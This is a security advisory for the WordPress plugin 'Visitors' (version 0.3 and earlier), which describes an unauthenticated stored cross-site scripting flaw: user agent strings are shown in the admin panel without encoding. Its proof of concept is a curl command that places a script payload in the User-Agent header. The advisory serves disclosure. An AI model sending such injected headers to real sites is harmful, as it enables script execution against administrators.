Visitors <= 0.3 - Unauthenticated Stored Cross-Site Scripting (XSS)
Description
The plugin is affected by an Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability. The plugin would display the user's user agent string without validation or encoding within the WordPress admin panel.
Proof of Concept
$ curl -i http://localhost:10008/ --user-agent "</script><script>alert(1)</script>" The payload will be executed on the "visitors" page within the WordPress admin panel.
Affects Plugins
No known fix - plugin closed
References
Classification
Miscellaneous
Original Researcher
Mesut Cetin
Submitter
Mesut Cetin
Verified
Yes
Timeline
Publicly Published
2021-05-26 (about 3 months ago)
Added
2021-05-27 (about 3 months ago)
Last Updated
2021-07-11 (about 2 months ago)